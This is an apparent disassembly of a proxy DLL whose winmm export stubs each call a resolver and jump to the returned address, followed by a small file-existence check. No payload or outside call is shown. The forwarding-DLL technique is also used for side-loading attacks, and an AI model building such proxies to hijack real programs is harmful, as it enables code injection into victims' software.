push rw-data
call sub_10001960
jmp eax
mciGetDriverData
push rw-data
call sub_10001960
jmp eax
mciGetErrorStringA
push rw-data
call sub_10001960
jmp eax
mciGetErrorStringW
push rw-data
call sub_10001960
jmp eax
mciGetYieldProc
push rw-data
call sub_10001960
jmp eax
mciLoadCommandResource
push rw-data
call sub_10001960
jmp eax
mciSendCommandA
push rw-data
call sub_10001960
jmp eax
mciSendCommandW
push rw-data
call sub_10001960
jmp eax
mciSendStringA
push rw-data
call sub_10001960
jmp eax
mciSendStringW
push rw-data
call sub_10001960
jmp eax
mciSetDriverData
push rw-data
call sub_10001960
jmp eax
mciSetYieldProc
push rw-data
call sub_10001960
jmp eax
mid32Message
push rw-data
call sub_10001960
jmp eax
midiConnect
push rw-data
call sub_10001960
jmp eax
midiDisconnect
push rw-data
call sub_10001960
jmp eax
midiInAddBuffer
push rw-data
call sub_10001960
jmp eax
midiInClose
push rw-data
call sub_10001960
jmp eax
midiInGetDevCapsA
push rw-data
call sub_10001960
jmp eax
midiInGetDevCapsW
push rw-data
call sub_10001960
jmp eax
midiInGetErrorTextA
push rw-data
call sub_10001960
jmp eax
midiInGetErrorTextW
push rw-data
call sub_10001960
jmp eax
midiInGetID
push rw-data
call sub_10001960
jmp eax
midiInGetNumDevs
push rw-data
call sub_10001960
jmp eax
midiInMessage
push rw-data
call sub_10001960
jmp eax
midiInOpen
push rw-data
call sub_10001960
jmp eax
midiInPrepareHeader
push rw-data
call sub_10001960
jmp eax
midiInReset
push rw-data
call sub_10001960
jmp eax
midiInStart
push rw-data
call sub_10001960
jmp eax
midiInStop
push rw-data
call sub_10001960
jmp eax
midiInUnprepareHeader
push rw-data
call sub_10001960
jmp eax
midiOutCacheDrumPatches
push rw-data
call sub_10001960
jmp eax
midiOutCachePatches
push rw-data
call sub_10001960
jmp eax
midiOutClose
push rw-data
call sub_10001960
jmp eax
midiOutGetDevCapsA
push rw-data
call sub_10001960
jmp eax
midiOutGetDevCapsW
push rw-data
call sub_10001960
jmp eax
midiOutGetErrorTextA
push rw-data
call sub_10001960
jmp eax
midiOutGetErrorTextW
push rw-data
call sub_10001960
jmp eax
midiOutGetID
push rw-data
call sub_10001960
jmp eax
midiOutGetNumDevs
push rw-data
call sub_10001960
jmp eax
midiOutGetVolume
push rw-data
call sub_10001960
jmp eax
midiOutLongMsg
push rw-data
call sub_10001960
jmp eax
midiOutMessage
push rw-data
call sub_10001960
jmp eax
midiOutOpen
push rw-data
call sub_10001960
jmp eax
midiOutPrepareHeader
push rw-data
call sub_10001960
jmp eax
midiOutReset
push rw-data
call sub_10001960
jmp eax
midiOutSetVolume
push rw-data
call sub_10001960
jmp eax
midiOutShortMsg
push rw-data
call sub_10001960
jmp eax
midiOutUnprepareHeader
push rw-data
call sub_10001960
jmp eax
midiStreamClose
push rw-data
call sub_10001960
jmp eax
midiStreamOpen
push rw-data
call sub_10001960
jmp eax
midiStreamOut
push rw-data
call sub_10001960
jmp eax
midiStreamPause
push rw-data
call sub_10001960
jmp eax
midiStreamPosition
push rw-data
call sub_10001960
jmp eax
midiStreamProperty
push rw-data
call sub_10001960
jmp eax
midiStreamRestart
push rw-data
call sub_10001960
jmp eax
midiStreamStop
push rw-data
call sub_10001960
jmp eax
mixerClose
push rw-data
call sub_10001960
jmp eax
mixerGetControlDetailsA
push rw-data
call sub_10001960
jmp eax
mixerGetControlDetailsW
push rw-data
call sub_10001960
jmp eax
mixerGetDevCapsA
push rw-data
call sub_10001960
jmp eax
mixerGetDevCapsW
push rw-data
call sub_10001960
jmp eax
mixerGetID
push rw-data
call sub_10001960
jmp eax
mixerGetLineControlsA
push rw-data
call sub_10001960
jmp eax
mixerGetLineControlsW
push rw-data
call sub_10001960
jmp eax
mixerGetLineInfoA
push rw-data
call sub_10001960
jmp eax
mixerGetLineInfoW
push rw-data
call sub_10001960
jmp eax
mixerGetNumDevs
push rw-data
call sub_10001960
jmp eax
mixerMessage
push rw-data
call sub_10001960
jmp eax
mixerOpen
push rw-data
call sub_10001960
jmp eax
mixerSetControlDetails
push rw-data
call sub_10001960
jmp eax
mmDrvInstall
push rw-data
call sub_10001960
jmp eax
mmGetCurrentTask
push rw-data
call sub_10001960
jmp eax
mmTaskBlock
push rw-data
call sub_10001960
jmp eax
mmTaskCreate
push rw-data
call sub_10001960
jmp eax
mmTaskSignal
push rw-data
call sub_10001960
jmp eax
mmTaskYield
push rw-data
call sub_10001960
jmp eax
mmioAdvance
push rw-data
call sub_10001960
jmp eax
mmioAscend
push rw-data
call sub_10001960
jmp eax
mmioClose
push rw-data
call sub_10001960
jmp eax
mmioCreateChunk
push rw-data
call sub_10001960
jmp eax
mmioDescend
push rw-data
call sub_10001960
jmp eax
mmioFlush
push rw-data
call sub_10001960
jmp eax
mmioGetInfo
push rw-data
call sub_10001960
jmp eax
mmioInstallIOProcA
push rw-data
call sub_10001960
jmp eax
mmioInstallIOProcW
push rw-data
call sub_10001960
jmp eax
mmioOpenA
push rw-data
call sub_10001960
jmp eax
mmioOpenW
push rw-data
call sub_10001960
jmp eax
mmioRead
push rw-data
call sub_10001960
jmp eax
mmioRenameA
push rw-data
call sub_10001960
jmp eax
mmioRenameW
push rw-data
call sub_10001960
jmp eax
mmioSeek
push rw-data
call sub_10001960
jmp eax
mmioSendMessage
push rw-data
call sub_10001960
jmp eax
mmioSetBuffer
push rw-data
call sub_10001960
jmp eax
mmioSetInfo
push rw-data
call sub_10001960
jmp eax
mmioStringToFOURCCA
push rw-data
call sub_10001960
jmp eax
mmioStringToFOURCCW
push rw-data
call sub_10001960
jmp eax
mmioWrite
push rw-data
call sub_10001960
jmp eax
mmsystemGetVersion
push rw-data
call sub_10001960
jmp eax
mod32Message
push rw-data
call sub_10001960
jmp eax
mxd32Message
push rw-data
call sub_10001960
jmp eax
sndPlaySoundA
push rw-data
call sub_10001960
jmp eax
sndPlaySoundW
push rw-data
call sub_10001960
jmp eax
tid32Message
push rw-data
call sub_10001960
jmp eax
timeBeginPeriod
push rw-data
call sub_10001960
jmp eax
timeEndPeriod
push rw-data
call sub_10001960
jmp eax
timeGetDevCaps
push rw-data
call sub_10001960
jmp eax
timeGetSystemTime
push rw-data
call sub_10001960
jmp eax
timeGetTime
push rw-data
call sub_10001960
jmp eax
timeKillEvent
push rw-data
call sub_10001960
jmp eax
timeSetEvent
push rw-data
call sub_10001960
jmp eax
waveInAddBuffer
push rw-data
call sub_10001960
jmp eax
waveInClose
push rw-data
call sub_10001960
jmp eax
waveInGetDevCapsA
push rw-data
call sub_10001960
jmp eax
waveInGetDevCapsW
push rw-data
call sub_10001960
jmp eax
waveInGetErrorTextA
push rw-data
call sub_10001960
jmp eax
waveInGetErrorTextW
push rw-data
call sub_10001960
jmp eax
waveInGetID
push rw-data
call sub_10001960
jmp eax
waveInGetNumDevs
push rw-data
call sub_10001960
jmp eax
waveInGetPosition
push rw-data
call sub_10001960
jmp eax
waveInMessage
push rw-data
call sub_10001960
jmp eax
waveInOpen
push rw-data
call sub_10001960
jmp eax
waveInPrepareHeader
push rw-data
call sub_10001960
jmp eax
waveInReset
push rw-data
call sub_10001960
jmp eax
waveInStart
push rw-data
call sub_10001960
jmp eax
waveInStop
push rw-data
call sub_10001960
jmp eax
waveInUnprepareHeader
push rw-data
call sub_10001960
jmp eax
waveOutBreakLoop
push rw-data
call sub_10001960
jmp eax
waveOutClose
push rw-data
call sub_10001960
jmp eax
waveOutGetDevCapsA
push rw-data
call sub_10001960
jmp eax
waveOutGetDevCapsW
push rw-data
call sub_10001960
jmp eax
waveOutGetErrorTextA
push rw-data
call sub_10001960
jmp eax
waveOutGetErrorTextW
push rw-data
call sub_10001960
jmp eax
waveOutGetID
push rw-data
call sub_10001960
jmp eax
waveOutGetNumDevs
push rw-data
call sub_10001960
jmp eax
waveOutGetPitch
push rw-data
call sub_10001960
jmp eax
waveOutGetPlaybackRate
push rw-data
call sub_10001960
jmp eax
waveOutGetPosition
push rw-data
call sub_10001960
jmp eax
waveOutGetVolume
push rw-data
call sub_10001960
jmp eax
waveOutMessage
push rw-data
call sub_10001960
jmp eax
waveOutOpen
push rw-data
call sub_10001960
jmp eax
waveOutPause
push rw-data
call sub_10001960
jmp eax
waveOutPrepareHeader
push rw-data
call sub_10001960
jmp eax
waveOutReset
push rw-data
call sub_10001960
jmp eax
waveOutRestart
push rw-data
call sub_10001960
jmp eax
waveOutSetPitch
push rw-data
call sub_10001960
jmp eax
waveOutSetPlaybackRate
push rw-data
call sub_10001960
jmp eax
waveOutSetVolume
push rw-data
call sub_10001960
jmp eax
waveOutUnprepareHeader
push rw-data
call sub_10001960
jmp eax
waveOutWrite
push rw-data
call sub_10001960
jmp eax
wid32Message
push rw-data
call sub_10001960
jmp eax
winmmDbgOut
push rw-data
call sub_10001960
jmp eax
winmmSetDebugLevel
push rw-data
call sub_10001960
jmp eax
wod32Message
push rw-data
call sub_10001960
jmp eax
_initterm
jmp [ _initterm@IAT ]
sub_10002cd0
mov eax [ esp + 0x4 ]
push eax
call [ GetFileAttributesA@IAT ]
xor ecx ecx
cmp eax 0xffffffff
setne cl
mov eax ecx
retn
